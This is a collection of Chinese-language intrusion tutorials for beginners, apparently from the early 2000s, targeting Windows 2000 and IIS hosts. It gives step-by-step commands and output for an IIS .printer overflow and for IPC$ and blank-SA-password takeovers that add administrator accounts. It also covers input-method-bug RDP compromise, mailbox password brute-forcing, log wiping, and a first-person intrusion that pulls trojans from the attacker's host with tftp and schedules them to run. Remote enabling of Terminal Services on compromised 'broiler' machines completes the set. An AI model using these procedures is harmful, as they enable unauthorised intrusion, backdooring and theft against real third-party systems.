japanese edition:   4
japanese edition, sp1: 5
korea edition:   6
korea edition, sp1: 7
mexico edition:   8
mexico edition, sp1: 9

c:/>iis5hack 127.0.0.19 80 1 119
iis5 remote .printer overflow. writen by sunx
http://www.sunx.org
for test only, dont used to hack,
Listn: 80

connecting...
sending...
Now you can telnet to 3739 port
good luck

溢出成功！
c:/>nc 127.0.0.19 119
http://www.sunx.org

Microsoft Windows 2000 [Version 5.00.2195]
(C) 版权所有 1985-2000 Microsoft Corp.

C:/WINNT/system32>

OK，我们又成功取得system权限！玩吧。

（6）139端口入侵
我们先确定一台存在139端口漏洞的主机。用扫描工具扫描！比如SUPERSCAN这个端口扫描工具。假设现在我们已经得到一台存在139端口漏洞的主机，我们要使用nbtstat -a IP这个命令得到用户的情况！现在我们要做的是与对方计算机进行共享资源的连接。
用到两个NET命令，下面就是这两个命令的使用方法
NET VIEW?
作 用：显示域列表、计算机列表或指定计算机的共享资源列表。?
命令格式：net view [//computername | /domain[:domainname]?
参数介绍：?
<1>键入不带参数的net view显示当前域的计算机列表。?
<2>//computername 指定要查看其共享资源的计算机。?
<3>/domain[:domainname]指定要查看其可用计算机的域?

NET USE?
作用：连接计算机或断开计算机与共享资源的连接，或显示计算机的连接信息。?
命令格式：net use [devicename | *] [//computername/sharename[/volume]?
[password | *] [/user:[domainname/]username] [/delete] |?
[/persistent:{yes | no]}?
参数介绍：?
键入不带参数的net use列出网络连接。?
devicename指定要连接到的资源名称或要断开的设备名称。?
//computername/sharename服务器及共享资源的名称。?
password访问共享资源的密码。?
*提示键入密码。 /user指定进行连接的另外一个用户。?
domainname指定另一个域。?
username指定登录的用户名。?
/home将用户连接到其宿主目录?
/delete取消指定网络连接。?
/persistent控制永久网络连接的使用。?
C:/net use //IP
C:/net view //IP
我们已经看到对方共享了他的C，D，E三个盘
我们要做的是使用NBTSTAT命令载入NBT快取.
c:/>nbtstat –R 载入NBT快取
c:/>nbtstat –c 看有无载入NBT快取
现在我们已经得到的139端口漏洞的主机IP地址和用户名，现在就该是我们进入他计算的时候了，点击开始---查找--计算机，将刚才找到的主机名字输入到上面，选择查找，就可以找到这台电脑了！双击就可以进入，其使用的方法和网上领居的一样。

（7）IPC入侵
所有程序：流光
开始：在主界面选择 探测→探测POP3/FTP/NT/SQL主机选项，或者直接按Ctrl+R。输入我们要破解的IP段，我们把“将FrontPage主机自动加入HTTP主机列表取消了”。因为我们只想获得IPC弱口令，这样可以加快扫描的速度 ：）填入IP，选择扫描NT/98主机。在“辅助主机”那里的“IPC$主机”前面打勾,然后在菜单了选“探测”，，扫描出结果以后，“IPC$主机”，选中后按“CTRL+F9”就开始探测IPC用户列表。会出现“IPC自动探测”
的窗体，把那两个选项都选了，然后点“选项” 为了加快弱口令扫描速度，这里的两个选项我们可以全部取消记住。然后点“确定”出来后点“是”就开始探测了。一会儿，结果出来了。比如我们探测出了用户名为“admin”的管理员，密码为“admin”，现在我们用命令提示符，熟悉下命令吧，输入:
net use　file://对方ip/ipc$ "密码"　/user:"用户名" || 建立远程连接
copy icmd.exe file://对方ip/admin$ 　 ||　admin$是对方的winnt目录
net time file://对方IP/       ||　看看对方的本地时间
at file://对方ip/ 启动程序的时间　启动程序名 启动程序的参数   ||　用at命令来定时启动程序
telnet 对方ip　端口

我们也可以改网页：
net use //ip/ipc$ "admin" /uesr:"admin" 回车。
出现“命令成功完成”。
然后输入“dir //ip/c$/*.*”
看到C:下所有内容。现在我们来改主页。一般主页放在c:/inetpub/wwwroot里面
输入“dir //ip/c$/inetpub/wwwroot/*.*”。就可以看到index.htm或index.asp或default.htm或 default.asp.这些就是主页了，假如你黑页在C:下，就输入"copy 主页文件 //ip/c$/inetpub/wwwroot"覆盖原文件这样就行了，简单吧？

日志清除，断开连接 ：
我们copy cl.exe ，clear.exe 上去，再执行，就可以清除日志，比如clear all ：清除所有的日志。然后在断开连接：net use file://ip/ipc$ /delete

（8）超管SA空密码漏洞
使用的工具:流光IV
启动流光，按Ctrl+R。出现扫描设置对话框，设置扫描IP段，并且选择扫描的类型为SQL。点击“确定”，进行扫描，假设我们取得主机：127.0.0.1，然后点击“工具” —— SQL远程命令（或者Ctrl+Q），填入主机IP（127.0.0.1）、用户（sa）、密码（空）点击“连接”，出现远程命令行的界面。
net user heiying heiying1 /add     填加一个heiying的帐号和密码heiying1
net localgroup administrators heiying /add 将我们创建的heiying帐号填加到管理组。
下面我们来做跳板：
打开cmd.exe,输入net use //127.0.0.1/ipc$ "heiying1" /user:"heiying"命令
显示命令成功完成。
上传srv.exe：
copy srv.exe //127.0.0.1/admin$/system32
上传ntlm.exe：
copy ntlm.exe //127.0.0.1/admin$/system32
启动服务：
首先用net time //127.0.0.1
看看对方主机的时间,(假如回显//127.0.0.1 的本地时间是上午12.00)，然后我们用at //2127.0.0.1 12.01 srv.exe命令来启动srv.exe。等一分钟后就可以telnet了。
一分钟后在本机命令提示符中输入：
telnet Ｘ.Ｘ.Ｘ.Ｘ 99
然后我们要启动NTLM.exe：
在telnet状态下直接输入ntlm回车。
显示：windows 2000 telnet dump,by assassin,all rights reserved.done!
然后从新启动对方主机的telnet服务：net stop telnet（先关闭telnet服务）再输入net start telnet（启动telnet服务）然后我们退出telnet，然后在命令行下输入telnet 127.0.0.1,依照提示,接着输入用户名：heiying,密码：heiying1，回车。这样,我们的跳板就做好了，简单吧？
（上面上传的srv和ntlm等东东还有一个简便方法，全都可以直接用流光工具菜单里的种植者上传，60秒后自动运行，不用敲命令！呵呵~~~~方便吧！）

（9）如何用流光破解信箱密码
这次的目标是21CN，运行流光IV，选择POP3主机----右键----编辑----添加，填上：pop.21cn.com，其他的就用默认吧！不用更改，确定就行了。到下一步，还是右键-----从列表中添加------选择一个字典，没有的到网上下载一个字典，或者到黑白网络去下载，我们用简单模式探测！这样速度比较快，然后就等着成果吧，上次我以下就破了5个邮箱出来。

（10）frontpage进行攻击
打开您自己的Frontpage，文件菜单下选择“打开站点”，然后在文件夹框里写入http://127.0.0.1（http://不要漏掉）。按下“打开”按钮，一会后，出现了文件夹，成功了，现在就可以操作网页文件了。如果跳出错误信息，表示有密码，我们用以下http://127.0.0.1/_vti_pvt/service.pwd,这是默认的密码文件，下载下来，找个解密器破密码吧！破出来后就还可以改网页。这个只能改该网页，没什么玩的。

（11）用肉鸡做ＳＯＣＫ５代理跳板
需要软件：srv.exe，ntlm.exe，snakeSksockserver.exe，SocksCap.exe。
首先我们在命令提示符下建立IPC$管道：
net use //127.0.0.1/ipc$ "密码" /user:帐号
通道建立好后，我们把srv.exe sss.exe ntlm.exe全部上传。
c:/copy srv.exe //10.10.10.10/admin$
1 files copied!
c:/copy ntlm.exe //10.10.10.10/admin$
1 files copied!
c:/copy sss.exe //10.10.10.10/admin$
1 files copied!
复制完毕后，
看肉鸡上现在的时间：
c:/net time //127.0.0.1
显示当前时间是 2002/4/13 晚上 09：00
我们来启动srv.exe
c:/at //127.0.0.1 09:01 srv.exe
等到09：01后。我们来连接肉鸡：
c:/telnet 127.0.0.1 99
连上后显示：
c:/winnt/system32>
接着我们启动NTLM.exe
c:/winnt/system32>ntlm
显示：
Windows 2000 Telnet Dump, by Assassin, All Rights Reserved.
Done!
C:/WINNT/system32>
首先我们终止srv.exe的telnet服务：
C:/WINNT/system32>net stop telnet
继续：
C:/WINNT/system32>net start telnet
再启动TELNET。
OK，我们来登陆
c:>telnet 127.0.0.1
*==========================================================
Microsoft Telnet
*==========================================================
c:>
好了，一切顺利，我们现在正式开始做代理：
c:>sss.exe -install <---------开始安装
显示：
c:>sksockserver installed!
来看看配置：
c:>sss -config show
显示：
SkServer Port = 1813   <----开放服务的端口 ,我们记着这个1813端口哦
SkServer StartType: 3 - Manual   <---服务启动方式
SkServer Enable Client Set Num:0   <---客户端的项目个数
SkServer Pass SkServer Number:0   <---经过SkServer的项目个数

来启动服务：
c:>net start skserver
提示你正在启动，并且完成。
来检查一下是不是启动了：
c:>net start         <-----------看看启动的服务列表
These Windows 2000 services are started:

Print Spooler
Server
Snake SockProxy Service <---------------就是它，呵呵!
System Event Notification
TCP/IP NetBIOS Helper Service
Telephony
Telnet
The command completed successfully.

c:>_
好了，到这里我们已经做好了一个socks5代理了，我们自己的哦.OK，下面我们用sockscap来使用我们做代理。
安装好SocksCap后，我们在桌面上打开SocksCap V2，点开File选项选Settings...弹出卡片，在 SOCKS Server里面我们填肉鸡的IP：127.0.0.1，PortT填默认的1813端口，下面的我们选socks version 5，呵呵，和 Attempt local then remot,这是域名解析的顺序，先本地，然后才远程。设置完了点“确定”我们就可以使用了，添加应用程序到sockscap里面，点开那个"new"按钮，会弹出一个卡片，
Profile name ：程序名，随便写。
Command Line: 命令行，点后面的Browse...找到你的程序路径
Working:填好上面那个，这个就自动加上.
这样我们就把程序加到SocksCap里面了。
现在们可以双击里面的程序来使用，也可以选住程序在点"Run"来运行。

好了，终于写完了，上面的内容都很简单，很适合初学者，还望高手们不好见笑，刚好听说这次5.1有很多联盟有所行动，希望上面的内容能教会一部分人，少走弯路，让更多的人参与这次行动。UNIX和LINUX由于自己的功力也还不够，还差很远，所以还不敢写。

利用WIN2000的输入法漏洞在别人机子上跳舞
下面我来讲讲如何利用输入法漏洞远程入侵开了终端服务的windows 2000的机器：

首先我们确定某台机器的3389端口是开放的：

D://Nmapnt>nmapNT.exe -sS -p 3389 xxx.xxx.xxx.xxx

Starting nmapNT V. 2.53 by ryan@eEye.com

eEye Digital Security ( http://www.eEye.com )

based on nmap by fyodor@insecure.org ( www.insecure.org/nmap/ )

Interesting ports on FGF-DELL4300 (xxx.xxx.xxx.xxx):

Port State Service

3389/tcp open msrdp

Nmap run completed -- 255 IP addresses (93 hosts up) scanned in 542 seconds

D:/TOOLS/nmapNT/Nmapnt>

现在我们已经可以看到这台机器的终端服务是开放的，那么我们就可以开始行动了。

打开终端服务客户端，添上IP地址，选择连接。

稍等片刻，一般是很快的，就会出现熟悉的登陆对话框了，这是我们看看有没有输入法的漏洞。有关输入法的漏洞请参看相关文章。如果有输入法漏洞那么我们如何取得控制权呢？经过多次的研究试验。终于想出了一个办法。我们发现在跳至url后，我们双击winnt目录下的explorer.exe并没什么反应（是机上已经运行了，可是我们为什么看不到结果呢？），如果我们不断的进行双击，或者什么也不做，一会儿连接将被断开，在断开的一霎那，我们似乎看到了我们双击出来的窗口。经过几次试验，我们发现不登陆进去是不行的，将会被服务端断开。于是想办法先登陆进去，我想到了在帮助中打开用户管理器，经过试验，在跳至url中添入：mk:@MSITStore:C:/WINNT/Help/TSHOOTconcepts.chm::/where_usermgr.htm

在右侧会出现一个可以打开本地用户和组的管理器的链接，本来在正常情况下是可以打开这个管理器的，

可是在没有登陆进去的时候就是出不来，于是想另外的办法。终于想到了建立一个命令行的快捷方式。在跳

至url中输入：c:/winnt/system32，然后找到net.exe，右键点击net.exe，选择创建快捷方式，于是创建了

一个文件名为快捷方式net.lnk的文件，然后再右键点击这个快捷方式，选择属性，这时我们就可以输入我们

的命令了。在目标中添入我们要执行的命令的路径和参数就行了，我们还是用net命令，因此不必改路径了，

添加个账号test的命令如下，C:/WINNT/system32/net.exe user test/add。密码为空。然后双击这个快捷方

式运行它。然后我们把这个账号添加到administrators组中，

C:/WINNT/system32/net.exe localgroup administrators test/add。OK!再运行。我们现在已经基本上成功了，

关掉帮助窗口，用test账号登陆，密码为空。进去后我们把刚才建的快捷方式删掉。然后再将本地用户的

TSinternetuser账号加进administrators组中，设置密码。这样我们下次就可以用这个账号进来了。然后

再用这个账号登陆一下，如果能够登陆，就删掉刚刚建立的test账号。

这台机器就这样控制在我们的手里了。。。。。。

方法二：

其过程如下：

1.扫描 3389 port 终端服务默认；

2.用终端客户端程序进行连接；

3.按ctrl+shift调出全拼输入法（其他似乎不行），点鼠标右键（如果其帮助菜单发灰，就赶快赶下家吧，人家打补丁了），点帮助，点输入法入门；

4.在"选项"菜单上点右键--->跳转到URL"，输入：c:/winnt/system32/cmd.exe.（如果不能确定NT系统目录，则输入：c:/ 或d:/ ……进行查找确定）；

5.选择"保存到磁盘" 选择目录：c:/inetpub/scripts/，因实际上是对方服务器上文件自身的复制操作，所以这个过程很快就会完成；

6.打开IE，输入：http://ip/scripts/cmd.exe?/c dir 怎么样？有cmd.exe文件了吧？这我们就完成了第一步；

7.http://ip/scripts/cmd.exe?/c echo net user guest /active:yes>go.bat

8.http://ip/scripts/cmd.exe?/c echo net user guest elise>>go.bat

9.http://ip/scripts/cmd.exe?/c echo net localgroup administrators /add guest>>go.bat

10.http://ip/scripts/cmd.exe?/c type go.bat 看看我们的批文件内容是否如下：

net user guest /active:yes

net user guest elise

net localgroup administrators /add guest

11.在"选项"菜单上点右键--->跳转到URL"，输入：c:/inetpub/scripts/go.bat --->在磁盘当前位置执行；

12.呵呵，大功告成啦，这样我们就激活了服务器的geust帐户，密码为：elise，超级用户呢！ （我喜欢guest而不是建立新帐户，这样似乎不易被发现些），这样你就可用IPC$连接，想怎样做就怎样做了，当然，你也可用guest直接登陆到他的服务器，到他机器上去跳舞吧：）

方法三：

用端口扫瞄程序扫IP的3389端口，得到xx.xx.xx.xx。

　 2、运行windows2000终端客户程序，在服务器输入框里填入：xx.xx.xx.xx ，连接。

　 3、出现windows2000的登陆窗口，按下CTRL+SHIFT键，出现全拼输入法。

　 4、在输入法状态条上按mouse右键，选择帮助，选择输入指南，选择"选项"按右键。

　 5、选择"跳转到URL"，输入：c:/winnt/system32/cmd.exe.

　 6、选择"保存到磁盘"。

　 7、选择目录：c:/inetpub/scripts/

　 8、打开IE，输入：xx.xx.xx.xx/scripts/cmd.exe?/c+dir+c:/ （知道了吧）

　 9、输入：xx.xx.xx.xx/scripts/cmd.exe?/c+echo+BEIJING+>c:/inetpub/wwwroot/default.asp

10。OK

一次简单入侵
又是一个休息日，闲得无聊，打开电脑，看了几大门户站的八卦新闻，愈看愈觉就得没劲。做点啥趣事呢？有了！前几天一OICQ聊友叫我帮忙搞定一主机，一直懒得搞，那么现在就去找找这主机的晦气吧。
看看这主机是否是网站先，用IE打开它的IP：61。170。168。168，出现“该页无法显示”。看来这主机还没WEB网页。祭起我的“X-SCAN”宝刀，全面扫描一下它的各种漏洞，我就不信他没有漏洞！（玩黑必备一：眼睛长到头顶上）
X-SCAN扫描结果报告：
“端口开放：1433、3389
ASP 漏洞：don't find CGI漏洞： don't find IIS漏洞don't find……，SQL：SA /NULL”
呵呵，大局已定，大家看到了有哪些漏洞吗？什么，你不懂鸟语？哇噻，你先去补习鸟语再到我这来！对了，我们的白灵、流二位大虾精通由各种乱码加鸟语组成的火星ASP语言，听说二位不日将移民火星，你趁他们还在地球快去拜师学艺啊！
再接着卖我的黄婆烂瓜……
3389——我得最爱！利用远程主机打开的远程控制功能（通过3389连接）进入它的WINDOWS图形界面，这种感觉对我等菜鸟来说可不是DOS破界面能比的哦~~
废话少说，打开我的“WINDOW2000远程客户程序”，填IP、点“联接”~~啊？连不上！再连~~还是不行！55555……输入法漏洞是玩不成了。
一招不行再换一招！点根烟先……打开“天行网络”所制的精品软件——SQLEXEC，填上IP，用户名：SA，密码为空，点“连接”---“：（连接成功！”
进来了，谈笑间我就进来了，我真厉害~~（玩黑必备二：自夸不怕吓死人）。先看看它的C盘的文件：DIR C：，OK！这机子装的是WINNT，怪不得我用WIN2000的远程客户程序连不上，可是它怎么会打开WIN2000的远程连接用端口-3389端口呢？
算了，越想越乱，忙我的正事吧。
为安全起见，让我看看它建立了哪些连接进程：“netstat -n”……哈，反馈回来的信息都是一些196开头的IP，没开TTY监听，这该不会是个局域网的服务器吧？
再来看看我现在的权限有多少：“net user aaa 1234 /add”－－－“成功建立新用户”。呵呵，权限还不小，能建新用户哦~~由于我机子用的是WIN98，所以没法用这新建的用户名为AAA，密码为1234的帐户进行连接，这帐户对我来说根本
没用……
现在，我们即将开始取得远程主机的最最最……大权限！啥？你不信？呵呵，说你菜你还不高兴，听说过木马吗？听说过大名鼎鼎专玩木马的“符号”大虾吗？哦，你不知木马只知符大虾……行，赶明儿我让符大虾在你机子里也放个木马，这样你就
能深刻理解啥叫木马了~~
继续攻击……我们现在就要上传个木马到远程主机。木马“广外女生”现在国内很流行，前几天也曾去黑网下栽了一个，它的被控端程序才90K，上传比较容易，就用它做远程主机的“后门”吧。1。打开TFTP（一个能把你的PC变成FTP服务器的小程序）——
2。把“广外女生”的被控端程序gw.exe复制到我的C盘TFTP默认文件路径下。3。在远程主机里输入命令："tftp -i xx.xx.xx.xx get gw.exe c:/gw.exe"
5分钟后，GW。EXE已乖乖在躺在远程主机的C盘里了~~~
现在，得想法子运行GW。EXE：1。打入命令"net time"---远程主机反馈当前时间"09:35"。 2.打入程序起动时间命令"at 09:37 c:/gw.exe"（GW在9：37运行）——出现主机反应：“建立一个新任务，ID=1”
OK！二分钟后将运行我的“广外女生”了！
打开我的“广外”控制端程序，在主机查找栏里填上“61.170.168.160---61.171.168.170”，点“查找”。扫描很慢……别急……扫完了……啊？！在这扫描的IP端里无中“奖”主机！怪事啊！是远程主机的“广外”没有运行还是我对这控制端程序的操
作错误？一定是这破“广外”本身程序不行，太烂了~~（玩黑必备三：一切都不是我的错！）。
看来，今天我只得请出封存已久的国货精品木马——“冰河”了。我的“冰河2。2”的被控端有200多K，估计上传时间会很久，但如果上传成功，它的功能可不是“广外”所能与之并论的啊！另外，对冰河的界面操作也不会似“广外”那陌生……
言归正传，现在开始上传“冰河”：“tftp -i xx.xx.xx.xx get G-server.exe c:/inetpub/GG.exe"（为不至于太过醒目，这次把文件传到C盘的INETPUB文件包下）
缓慢上传中……让我再点根烟，趁这功夫去“黑白网络”的技术论坛逛逛去……
已过25分钟了，进远程主机瞧瞧是否已下栽成功了~~OK！冰河已在那里了。接着：“net time”，反馈信息：10:30”。“at 10:32 c:/inetpub/GG.exe”，反馈信息“运行新任务，ID=1”
二分钟后，打开“冰河”控制端，加入远程主机IP，连接……成功！接着再：添加服务器端连接密码、添加冰河运行自动通知发往信箱、删除“广外”、“冰河”被控端程序。
……
现在，这主机的一切已尽在我眼前了，真爽啊！明天，我也许会把一个SOCK5代理的服务器端程序放进这主机，大家以后要是想用SOCK5代理，又懒得去漫无目标的查找的话，请找我，我会把我这个人专用“肉机”贡献出来的。
远程CMD下安装终端服务TS

============================================
记得好多人说过关于CMD下安装终端的事，但一直没能成功。但他家都说好使.我现在可以明明白白的告诉大家了！这种方法可行，但是是有条件的！
其条件是：
其计算机要安装了3389但是没有启动！
也就是说，如果对方没有安装3389，这种方法是不可能的！
我现在正在研究在CMD下无人安装终端服务！反复折腾N遍，终于理清了这个安装需要哪些文件了，见下：
所需文件清单：
BHP001.IN_
BHP005.IN_
BHP006.IN_
BHP007.IN_
BHP008.IN_
BHP013.HL_
BHP015.IN_
BHP017.IN_
BHP018.IN_
BHP024.IN_
BHSUPP.DL_
DEFAULT.AD_
DEFAULT.CF_
DEFAULT.DF_
HEXEDIT.DL_
MCAST.DL_
NETMON.IN_
NETMON2.CH_
NMSUPP.DL_
PARSER.DL_
PARSER.IN_
SLBS.DL_
这个是 W2K ADV SERVER 的文件，对于这个安装，解压后的文件没用，必须要压缩格式的文件（奇怪），更可气的是，安装程序没有复制任何文件到系统里（除了TEMP目录，呵呵），在WINNT目录下有个文件叫 setupapi.log，从中也可以看出，对上述这些文件的复制全部失败（文件内容较多，我就不贴了），但安装却成功了...这个是从光盘上安装的，要远程安装，总不能电话通知管理员放光盘吧 ，于是把这些文件COPY到SYSTEM32目录下，再装，还是弹出对话框。。。由此确定系统中某处肯定保留了最初安装W2K时的安装路径
果然在注册表中找到了，见下：

Root Key:
HKEY_LOCAL_MACHINE/

Subkey :
SOFTWARE/Microsoft/COM3/Setup
SOFTWARE/Microsoft/MSDTC/Setup
SOFTWARE/Microsoft/Transaction Server/Setup(OCM)
SOFTWARE/Microsoft/Windows/CurrentVersion/Setup

KeyName:
SourcePath

Keyvalue:
F:/SIMPCHIN/WIN2000/ADV_SRV/

注意：Keyvalue 不包含“i386”，安装时会自动加上这个路径。

对于 sysocmgr 安装程序而言，所需要的是 SOFTWARE/Microsoft/Windows/CurrentVersion/Setup
于是，在 D:/ 新建一目录为 i386 ，把上述文件COPY进去，再把这个注册表项的值改为 D:/，卸载TS，再安装TS

最后，再简单说一下命令行下安装TS的过程，首先，要感谢 小青豆，是他教我如何远程修改注册表的，向他致敬！
先在命令行下建立两个 answer file，如下：
echo [Components] > c:/aa
echo TSEnable = off >> c:/aa

echo [Components] > c:/bb
echo TSEnable = on >> c:/bb

注：文件 aa 是用来卸载TS的，文件 bb 是用来安装TS的，路径随意，只要和下述命令中的一致即可。

然后键入：
sysocmgr /i:c:/winnt/inf/sysoc.inf /u:c:/aa /q
重起完成后，键入
sysocmgr /i:c:/winnt/inf/sysoc.inf /u:c:/bb /q

注：c:/winnt/.... 这个路径根据实际情况需更改，如果不希望立刻重起，在 /q 后加上 /r 参数。

再谈3389 !
如今都抱怨3389的肉鸡不好找了.原来的时候俺也没玩过! 偶见俺个死党玩的入迷.没办法也来试试.结果现在的进展.. 两天拿下了三十二台.而且)______ 速度没有小于十M的,
说说方法吧,你整个聊天室了,或到网上查一下宽带了,先搞出这个地段宽带的IP,下面的事就好办多了,随便整个扫描器让其只扫3389端口.现在大部分宽带的用户和电信的大哥们都是这个~~125*2
好了利用这点时间我们做一件事,自己有FTP空间的话上传一个批命令,里面这样写 net user abc abc /add
net localgroup administrators abc /add
以上的意思大家应该都明白吧就是建立一个密码为ABC的用户ABC并将其加入到管理员组， 然后另存为1。BAT，传到你的空间上。
OK我们现在看看扫描结果，登陆到一台机器，输入法切换，调出帮助文件，空白处点击鼠标的右健，选“跳至URL”在出来的输入档里打上我们的刚才上传的1。BAT的地址，***。***。***。***/1。BAT。选择，在当前打开。OK了现在你可以用ABC账号登陆他的机器了。登陆以上要做的事：
http://download.microsoft.com/downl..._SP2_x86_CN.EXE先给他打上输入法补丁
local-machine->software->microsoft->winnt->currentversion->winlogon

DontDisplayLastUserName:1
修改注册表相应健值,这样网管就不会查到你了
呵呵
怎样可以远程打开对方的3389端口
如果对方的端口有开放:
telnet 192.168.0.1
输入用户名/密码
C:/>
//成功进入!!!!
进入后,再次检查终端组件是否安装:
c:/>query user
这个工具需要安装终端服务.

这样就进一步确定了组件没有被安装.如果返回:
USERNAME SESSIONNAME ID STATE IDLE TIME LOGON TIME
>w1     console   0 运行中 .   2002-1-12 22:5
//类似这样的信息,可能组件就已安装.

好!都清楚了,可以开始安装了.
---------------------------------------------------
C:/>dir c:/sysoc.inf /s   //检查INF文件的位置
c:/WINNT/inf 的目录

2000-01-10 20:00 3,770 sysoc.inf
1 个文件 3,770 字节
-----------------------------------------------------
C:/> dir c:/sysocmgr.* /s   //检查组件安装程序
c:/WINNT/system32 的目录

2000-01-10 20:00 42,768 sysocmgr.exe
1 个文件 42,768 字节
-----------------------------------------------------
c:/>echo [Components] > c:/wawa  
c:/>echo TSEnable = on >> c:/wawa
//这是建立无人参与的安装参数
c:/>type c:/wawa      
[Components]
TSEnable = on
//检查参数文件
------------------------------------------------------
c:/>sysocmgr /i:c:/winnt/inf/sysoc.inf /u:c:/wawa /q
-----------------------------------------------------
这一条就是真正安装组件的命令.
以上这条命令没有加/R参数,主机在安装完后自动重起.
如若加了/R参数主机就不会重起.

如果一切正常的话,几分钟后对方主机将会离线,当它重新回来时,
3389终端服务就已经开启.你就可以连上去了.

这里还有两种方法
第一种开启的办法:
使用DameWare Mini Remote Control远程连接上,
在"终端服务配置"里,重新启用RDP连接,马上就可以使用3389了.
第二种开启的办法:
修改远程注册表.
比如:
主机IP: 192.168.0.1
已有的帐号和密码: wawa/7788
首先与远程主机建立连接
net use //192.168.0.1/ipc$ "7788" /user:"wawa"
再打开本机注册表
"开始"==>"运行"==>regedit
在"注册表"下拉菜单中选择"连接网络注册表"
在"计算机名"中输入 //192.168.0.1
这样就进入了远程主机注册表.
现在我们找到这里:
hkey_local_machine/system/currentcontrolset/control/terminal server/winstations/rdp-tcp/fEnableWinStation
将fEnableWinStation值由0改为1

SQLEXEC或telnet进入后,检查终端组件是否安装:
c:/>query user
这个工具需要安装终端服务.
这样就进一步确定了组件没有被安装.如果返回:
USERNAME SESSIONNAME ID STATE IDLE TIME LOGON TIME
>w1     console   0 运行中 .   2002-1-12 22:5
//类似这样的信息,可能组件就已安装.
好!都清楚了,可以开始安装了.
---------------------------------------------------
C:/>dir c:/sysoc.inf /s   //检查INF文件的位置
c:/WINNT/inf 的目录

2000-01-10 20:00 3,770 sysoc.inf
1 个文件 3,770 字节
-----------------------------------------------------
C:/> dir c:/sysocmgr.* /s   //检查组件安装程序
c:/WINNT/system32 的目录

2000-01-10 20:00 42,768 sysocmgr.exe
1 个文件 42,768 字节
-----------------------------------------------------
c:/>echo [Components] > c:/wawa  
c:/>echo TSEnable = on >> c:/wawa
//这是建立无人参与的安装参数
c:/>type c:/wawa      
[Components]
TSEnable = on
//检查参数文件
------------------------------------------------------
c:/>sysocmgr /i:c:/winnt/inf/sysoc.inf /u:c:/wawa /q
-----------------------------------------------------
这一条就是真正安装组件的命令.
以上这条命令没有加/R参数,主机在安装完后自动重起.
如若加了/R参数主机就不会重起.

如果一切正常的话,几分钟后对方主机将会离线,当它重新回来时,
3389终端服务就已经开启.你就可以连上去了.

突破3389

不过很多人会有疑问，使用3389当然好了。可是Windows 2000的专业版是没有3389的功能的，你怎么开？如果您能够思考到这一步就说明您已经具有相当的黑客天赋了。Windows 2000的专业版本的确没有3389的功能，所以在我们在使用MS04-11溢出成功后想要开3389端口作为自己的远程控制的手段就需要在多费一番功夫了。首先利用MS04-11漏洞溢出之后我们至少可以使用Telnet之类的服务，如果你直接输入Ver命令只能够看到它Windows的补丁版本号，是无法看到具体的系统版本号马的，因此我们必须通过使用type这个命令打开系统中的Boot.ini文件判断一下作系统的Windows版本，在Boot.ini中的最后会显示：

[boot loader]

timeout=5

default=multi(0)disk(0)rdisk(0)partition(1)/WINNT

[operating systems]

multi(0)disk(0)rdisk(0)partition(1)/WINNT="Microsoft Windows 2000 Professional" /fastdetect /noguiboot

我们可以轻松的判断出该作系统应该是Windows 2000 Professional。在确定是Professional版本后，不过不要伤心Windows 2000 Professional一样可以通过手段让其打开3389服务。其实Windows 2000中，无论任何一个版本，它们的多数程序都是一样的，Server版本的Windows 2000和Professional的更为相似，它们的唯一不同仅仅局限在注册表上，我们只要在Professional的注册表中动一些手脚就可以让Professional变成Server。3am Laboratories公司制作的NTSwitch就是一个可以让Windows 2000 Professional变成Server版本的好工具。

不过如果手头上没有工具我们也可以进行手动的修改，首先我们需要自己生成一个注册表升级升级文件。我们先将自己的作系统安装为Windows 2000 Professional，使用注册表照相机Regsnap这个工具对注册表和整个系统生成报告，然后在找到Windows 2000 Server的安装光盘，将Windows 2000 Professional作系统升级为Windows 2000 Server，在作系统升级完成后，再一次使用Regsnap对注册表进行进行照像，然后在下载RegShot这个注册表分析软件将照的注册表提取分析，输出分析出的变化结果的差别文件，将差别文件保存为yu.reg。再一次用Telnet登陆溢出的目标计算机，然后上传我们保存好的差别注册表，在对方的作系统中输入［regedit.exe /s yu.reg］这串命令，此时对方的计算机就升级为Windows 2000 Server了，而你也可以顺利的开启对方的3389服务了。

在成功的开启了3389服务后，我们可以利用黑客营提供的3389连接工具对目标计算机进行远程连接，不过此时你也许会感到不方便，因为3389的远程管理不支持复制粘贴形式的文件传输，之能够复制粘贴本机的一些字符。对付这个问题我们只需要在网上找一个小型的FTP开启工具，将对方的FTP开启就可以了。即便此时有人乘虚而入正抢你的“猎物”，你可以使用［logout］命令将对方踢下去，然后删除掉对方溢出的帐号和口令，开启之后在根据前面所说的修改端口，然后帮助“猎物”打好补丁，防止其它的入侵者破坏你的“猎物”。一套完美的3389控制就做好了。

怎么样开3389端口，这里我把他们总结一下，很全面,希望对你有用:
1，打开记事本，编辑内容如下：
echo [Components] > c:/sql
echo TSEnable = on >> c:/sql
sysocmgr /i:c:/winnt/inf/sysoc.inf /u:c:/sql /q
编辑好后存为BAT文件，上传至肉鸡，执行。这里值得注意的是要确定winnt是否在c盘，如果在其他盘则需要改动。

2 (对xp/2000都有效) 脚本文件 本地开3389 工具:rots1.05
地址:www.netsill.com/rots.zip
使用方法：
在命令行方式下使用windows自带的脚本宿主程序cscript.exe调用脚本，例如：

c:/>cscript ROTS.vbs <目标IP> <用户名> <密码> [服务端口] [自动重起选项]

服务端口： 设置终端服务的服务端口。默认是3389。
自动重起选项： 使用/r表示安装完成后自动重起目标使设置生效。
使用/fr表示强制重起目标。（如果/r不行，可以试试这个）
使用此参数时，端口设置不能忽略。

比如扫描到了一个有NT弱口令的服务器，IP地址是222.222.222.222，管理员帐户是administrator，密码为空
运行CMD（2000下的DOS），我们给它开终端！
命令如下！
cscript reg.vbe 222.222.222.222 administrator "" 3389 /fr
上面的命令应该可以理解吧？cscript reg.vbe这是命令，后面的是IP，然后是管理员帐户，接这是密码，因为222.222.222.222 这台服务器的管理员密码是空的，那就用双引号表示为空，再后面是端口，你可以任意设置终端的端口，/fr是重启命令（强制重启，一般我都用这个，你也可以/r，这是普通重启）

脚本会判断目标系统类型，如果不是server及以上版本，就会提示你是否要取消。
因为pro版不能安装终端服务。
如果你确信脚本判断错误，就继续安装好了。

如果要对本地使用，IP地址为127.0.0.1或者一个点（用.表示），用户名和密码都为空（用""表示）。

脚本访问的目标的135端口，如果目标135端口未开放，或者WMI服务关闭，那么脚本就没用了。

3，下载3389自动安装程序-djshao正式版5.0
地址www.netsill.com/djshao.zip
说明：
